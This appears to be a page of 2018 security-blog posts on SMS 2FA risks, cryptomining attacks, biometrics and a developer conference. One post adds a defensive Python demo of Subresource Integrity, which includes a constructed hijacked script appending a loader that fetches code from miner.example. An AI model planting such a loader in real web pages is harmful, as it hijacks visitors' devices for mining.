Do you need another reason to stop using SMS for 2FA?

Posted in Computers and Internet, General, Security on March 7, 2018 by Will

In an age when data is gold and marketing is a way of life, you still probably don’t want to receive marketing on your mobile phone.  I always hate having to register for events or downloads because I know that email address is going to get sold and then I am going to start receiving my fair share of spam.  I bet most of my readers have a separate email account set up just for this reason.

Over the last year or so, I have noticed that I am getting more and more telemarketers calling my mobile phone.  I also know that I have been putting my mobile number into more sites than my home number, simply because it’s where I can typically be reached.  This has led me to start using a “spam” mobile number, just so I can filter out all of those unwanted calls more easily.

After reading about a Facebook user who started receiving SMS spam after registering a phone number for Facebook’s 2FA, I now know to use my “spam” mobile number for those sites where I can’t use real 2FA.  This is just new encouragement for me to go back through these sites and see if I can find a real One Time Password application option or a good FIDO U2F hardware device.  SMS codes can already be intercepted through SIM swapping or SS7 attacks; now the number you handed over for security might also be sold to the highest bidder so you can be spammed on it.  It’s time to stop using SMS for 2FA and find a better solution.

After writing and scheduling this story, I found a response from Facebook stating that the spam sent to the security SMS number was in fact an error.  For me, this does not change the fact that SMS is still insecure and easily hackable, and it should not be used if more secure options are available.  In the case of Facebook, you can use their mobile app to generate One Time Passcodes, and they will send secure push notifications; I would highly recommend using either of those options over SMS 2FA.

Yet another crypto hack, protect yourselves

Posted in Computers and Internet, General, Security on March 6, 2018 by Will

Over the last 6 months, the most prevalent stories in my news readers have been about the increase in crypto-mining malware incidents, as I commented on a few months back.  They are literally happening weekly, maybe even daily.  Last week I presented data showing a massive rise in phishing attacks.  These are targeted attacks, also called spear phishing, aimed at companies and individuals in order to get crypto-mining software into more locations.  Getting crypto-mining bots onto as many systems as possible, by leveraging traditional attack methods such as phishing, is a major headache for all companies and individuals out there.

The crypto currency explosion has brought everyone from every corner.  Most people associate Bitcoin with crypto currency, but there are many others out there.  All of these crypto currencies are a convenient way to move money with some anonymity.  Back in the days of early phishing, a hacker or a hacking team would go out and steal usernames and passwords and then sell them on the black market.  There were many points at which they could get caught, and the old adage of “follow the money” was the most common.  With crypto currencies, hackers can now move the money more secretly.  However, there were still spots where they could get caught, and rather than seek payment for services, I think everyone would agree that if you could just generate your own currency and avoid the middle people, that would be much easier.  That’s exactly what the hackers have thought too.  So now the name of the game is to get crypto-mining software on anything that has a CPU, and phishing for privileged credentials is less about selling them to others and more about being able to immediately use them to get the mining software loaded and making money.

This week, Tesla’s cloud servers were compromised and crypto-mining bots were loaded onto their Amazon Web Services instances.  A number of high profile companies have been compromised recently, but with fewer big headlines around them.  The main reason is that, although these companies were compromised, the hackers don’t necessarily leak the data contained on those servers.  That is not to say the data isn’t compromised in most cases, just that getting the crypto-mining bot up and running is more the focus, and the intelligence community knows this.  So why bring more panic and attention rather than just stop the malware in its tracks?

Knowing what the attacks are focused on, we should adjust our security to protect against this.  Crypto-mining bots are being added to cloud servers, where there is almost unlimited processing power.  They are also being added to web sites as file-less or drive-by attacks, so that every visitor gives a bit of their processing power to the mining malware collective.  And we are seeing many mainstream (and not-so-mainstream) mobile apps repackaged to include these mining bots, typically in a hidden mechanism that the end user would never notice until their device slows down and becomes unusable due to the mining operations.  Other platforms are being attacked too, including IoT (like your wireless cameras and wifi connected thermostats) and big industrial systems (SCADA) used in utilities and manufacturing.  Each attackable platform needs to make use of the appropriate tools to help combat these attacks.  I pointed out last time that it’s important to be up to date with your patches and to pay close attention to your data.  These recent attacks make it even more visible.

***Edit adding more missed hijacked sites***

I missed the UK government one:
http://www.bbc.com/news/technology-43025788

Or the list of 4300 other web sites that have been infected:
https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/

Los Angeles Times:
https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html
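The web-site cases above (the drive-by miners in the post body and the thousands of sites in the edit that all pulled the same hijacked third-party script) share one mechanism: the page trusted whatever bytes a vendor’s CDN served.  Subresource Integrity (SRI) is the browser-side control for exactly that, and the post does not mention it, so here is an added example (not the author’s code, not any site’s real markup) showing how the `integrity=` value is computed, how a browser’s check rejects a tampered copy, and a small audit that flags scripts a miner could ride in on.  The page, hostnames and script bodies are constructed for the demo; `.example` domains are reserved names.

```python
"""Added example (not from the original post): Subresource Integrity as a
defence against a hijacked third-party script. All HTML, hosts and script
bodies below are constructed for the demonstration."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Value for the integrity= attribute: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(body: bytes, integrity: str) -> bool:
    """What a browser does before executing a script with integrity=:
    hash the bytes actually received and run them only if a listed
    hash matches. A hijacked copy with extra code fails this check."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGOS and sri_hash(body, algo) == token:
            return True
    return False


class _ScriptTags(HTMLParser):
    """Collect the attribute dict of every <script> tag in a page."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def audit_scripts(html: str, site_host: str) -> list:
    """Flag third-party scripts without SRI, and SRI on cross-origin
    scripts that lack crossorigin= (the browser refuses to load those,
    so the pin silently breaks the page instead of protecting it)."""
    parser = _ScriptTags()
    parser.feed(html)
    findings = []
    for attrs in parser.scripts:
        src = attrs.get("src")
        if not src:
            continue  # inline script; SRI does not apply
        host = urlparse(src).hostname or site_host
        third_party = host.lower() != site_host.lower()
        has_sri = bool(attrs.get("integrity"))
        if third_party and not has_sri:
            findings.append((src, "third-party script without integrity="))
        elif third_party and has_sri and attrs.get("crossorigin") is None:
            findings.append((src, "integrity= on cross-origin script needs crossorigin="))
    return findings


# Constructed sample: the vendor script as originally published ...
ORIGINAL_JS = b"window.vendorWidget = function () { /* accessibility helper */ };\n"
# ... and the same file after a hijack appended a miner loader.
HIJACKED_JS = ORIGINAL_JS + (
    b'var m=document.createElement("script");'
    b'm.src="//miner.example/lib.js";document.head.appendChild(m);\n'
)

# Constructed page: one first-party script, one unpinned vendor script,
# one correctly pinned vendor script, and one pin missing crossorigin=.
SAMPLE_HTML = f"""<html><body>
<script src="/js/app.js"></script>
<script src="https://cdn.vendor.example/plus/scripts/widget.js"></script>
<script src="https://cdn.vendor.example/plus/scripts/pinned.js"
        integrity="{sri_hash(ORIGINAL_JS)}" crossorigin="anonymous"></script>
<script src="https://cdn.other.example/lib.js" integrity="{sri_hash(ORIGINAL_JS)}"></script>
</body></html>"""


def demo():
    """Returns (audit findings, pinned original still loads,
    hijacked copy would be executed)."""
    pinned = sri_hash(ORIGINAL_JS)
    return (audit_scripts(SAMPLE_HTML, "www.site.example"),
            sri_matches(ORIGINAL_JS, pinned),
            sri_matches(HIJACKED_JS, pinned))
```

The trade-off: a pinned script also stops loading when the vendor ships a legitimate update, so SRI only fits scripts you version explicitly; for the rest, a Content-Security-Policy `script-src` allowlist at least keeps the injected loader from fetching the miner from an arbitrary host.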

Too busy to blog…but come see my webinar

Posted in Computers and Internet, Conferences, Security on February 28, 2018 by Will

It’s been a busy couple of weeks since the DeveloperWeek conference.  There has been no shortage of security related news, with lots of 2018 predictions already becoming reality.  Unfortunately my work and real life have caught up with me and limited my weekly posts.  Don’t fret, I am coming back.  And if you miss me, come sign up for my webinar: register online here.  I’ll be covering my favorite reasons to use Application Shielding and Hardening, and all of the DIGIPASS for Apps tools and where to use them.  Bring your questions and I’ll answer all of them.

Multi-factor, not just biometrics.

Posted in Computers and Internet, General, Security on February 5, 2018 by Will

Biometric authentication is fairly commonplace today.  Just about everyone knows how to use the fingerprint scanner on most modern smartphones.  With the newer phones, facial scanning has started to take the place of the fingerprint.  And some mobile apps that are trying to up their security beyond the built-in platform options have included iris scanning.  Biometrics tick the “ease of use” and “strong security” boxes most of the time.

Where it starts to fall apart is when application owners implement only biometrics.  For years security experts have been telling application owners that they should be implementing multi-factor authentication.  This means pairing two different authentication technologies from at least two different factor groupings.  As a refresher, there are three authentication factor groups: “Something You Know”, “Something You Have” and “Something You Are”.  Taking two technologies from the same factor does not give you multi-factor authentication; you must have at least two technologies from different factors.  Biometrics fit into the “Something You Are” grouping and are a single factor.

Today a great write-up on the attack vectors currently plaguing the most common biometric technologies was published on DarkReading.  The attacks have been around for a while, but they still work.  When you read the article, it is striking how simple these attacks really are.  Biometrics are an advanced technology, and yet a piece of paper or a gummy bear is all that is needed to break them.  These attacks will be mitigated and new versions of the products will be released, but that will just invite new attacks.  Nothing is completely secure from every style of attack; it just takes longer to find the appropriate attack vector.

Application owners should see these attacks and think back to attacks on static passwords, on SMS passcodes and on all of the other authentication technologies.  When you take one form of an authentication factor on its own, there are probably a few different attacks against it.  When you combine technologies across the different factors, the attacks become much harder, and some become next to impossible.  The best applications implement multi-factor authentication in ways that only call attention to it when it is needed (or when risk is detected), and allow a user to continue doing what they need to without being impacted all the time.

Developer Week 2018 opens today

Posted in Computers and Internet, Conferences, General on February 5, 2018 by Will

Monday morning in Oakland, California, and Developer Week 2018 has started.  Registration is going well, and my colleague, Michael Williams, and I are all set up and ready to give our talk tomorrow.  Our talk is on Tuesday from 3:00 to 4:30 PM on the second floor in room 208, Workshop Stage 5.  We’d love to fill the room and get everyone in to hear about VASCO Data Security’s latest DIGIPASS for Apps mobile SDKs and eSignLive SDKs.  We will take you through how to leverage the free-to-trial DIGIPASS for Apps APIs to extend your app’s features and build in small security steps on your way to creating a fully trusted and secure mobile app.  We will also help you with implementing a full digital signature workflow, moving your app towards a complete electronic document processing implementation.  In the end we hope to leave you with information on how to use all of our technologies to enhance and speed up your mobile app strategy by giving you a number of new tools you can use in your daily development lives.

We hope to see you there, and questions are always welcome!

Hackathon @DeveloperWeek 2018 eSignLive by VASCO Winners!

Posted in Computers and Internet, Entertainment, General on February 4, 2018 by Will

Congratulations to our winners!

1st Place:

Esfer – This team decided to tackle the legality of peer-to-peer payments.  They created a beautiful prototype of a mobile application where a requester could create a legal document using the eSignLive SDK and send it to the payee, who would then sign the document, accept the terms and complete the transaction.

2nd Place:

VMatch – This team built a mobile app to connect conference organizers with volunteers.  It included a video conference component to interview candidates and then used the eSignLive Android SDK to create a volunteering contract with the organizer.

Great Apps!

Hackathon Day 2 – Let’s see your projects!

Posted in Computers and Internet, Entertainment, General on February 4, 2018 by Will

Start of the @DeveloperWeek 2018 Hackathon day 2.  We saw some amazing starts yesterday, some very innovative products and cool uses of our eSignLive SDKs.  Today we hope to see some of these projects get to a finished state.  You can still register your project online at the show website: http://accelerate.im/challenges/179.  We will be announcing our winners this afternoon, so make sure you get those projects completed for the judges.  If you are looking for our table, we have moved to the second floor; come up and ask us anything.

On a side note, Congratulations @TomBrady MVP, GOAT, and let’s go @Patriots!


$4000 in prizes this weekend, Hackathon @DeveloperWeek in San Francisco

Posted in Computers and Internet, General on February 3, 2018 by Will

Here we are, hanging out with a huge group of developers in SoMa.  There is a ton of cash on the line from over 20 vendors.  We are here offering $4000 in Amazon gift cards: $2000 for the first place winner (plus an extra $250 if you use the mobile SDKs), $1000 for the second place winner (plus the same extra $250 for mobile usage), and finally four prizes of $250 for the best reporting dashboards out there.  So if you’re a developer and need some cash this weekend, come down and give it a shot.

Great crowd and some awesome ideas floating around.  It is awe-inspiring to watch all these developers at work on different projects at once.  I had a colleague from another vendor take a trip down memory lane with me on just how much the tech space has changed.  We both worked for internet startups in the early ’90s, during the beginning of the Internet.  Things have come a long way.  To get this many developers in one spot, all working on problems and solutions for all different walks of life, things have certainly advanced.

There is still plenty of time and I’m sure there are plenty of problems out there that need solutions.

Google is doing their part, but it’s still not enough

Posted in Computers and Internet, Security on February 2, 2018 by Will

A few weeks ago, I posted some statistics about the state of mobile application security.  Specifically, a report showed that malware grew over 60% in just the last quarter of last year, and the Google Play Store alone published over 9 million new mobile applications last year.

This week Google published that they had removed over 700,000 malicious apps from the Google Play Store.  This is highly commendable, as it shows a firm commitment from Google to help improve their security image.  I think that is what everyone is overlooking: this helps improve the Android platform’s security image.  The removal of these apps from the closed application publishing service that Google provides is just a drop in the bucket in terms of the actual malware being published for the mobile platforms.  As my colleague points out in his LinkedIn post, apps can be downloaded and installed from many different app stores, and often are.  The Android platform has an image of being more open, and because of this it is also widely considered less secure than the Apple platform.

Attacks exist on both the iOS and Android platforms, and on pretty much any platform that has a CPU.  With the Android platform being more open and more flexible, it is probably always going to be more open to attack, or at least to publicized attacks.  Apple and a number of the other computing platforms out there are more closed, so we are less likely to hear about the attacks until something big happens or the media gets hold of it.

Taking the stance that the platform you are developing for is secure enough without implementing security controls within your own app is dangerous and negligent.  Google and Apple do their part, but the entire app development community needs to be vigilant.  Understand that, while the platforms publish big numbers and clean up their images, this is more about attracting more developers to their platforms and less about the actual security of those platforms.  Attack vectors change constantly and arrive at different platforms in many different ways, sometimes under the control of the OS provider, sometimes not.  As long as developers take the time to implement all of the security controls at their disposal, perhaps their app won’t wind up on the list of breached apps next time.

Join me at DeveloperWeek in San Francisco

Posted in Computers and Internet, Entertainment, Security on February 1, 2018 by Will

Just a quick post to encourage anyone in the San Francisco area this weekend and next week to come down to the DeveloperWeek conference and meet up.

Over the weekend I will be attending and helping host an event at the Hackathon.  If you want to play with some new mobile development tools or you’re interested in cloud digital signature products, come over and give our Hackathon a try.  There are some great prizes for the best projects.  Read more about the event and register for it over here: http://accelerate.im/challenges/179

And if you can’t get out to the Hackathon, but you still want to learn more about #DevOpSec or just want to know more about the latest tools in mobile application security, come attend our discussion on Tuesday from 3 to 4:30 PM.  We will give you a run-down of some of the tools we are giving free access to and then take you through some samples and answer any and all questions.  Register for the discussion and find more information here: http://sched.co/DGVX

It should be a great show, and there will be a lot of like-minded people around.  Stop by our booth, number #203.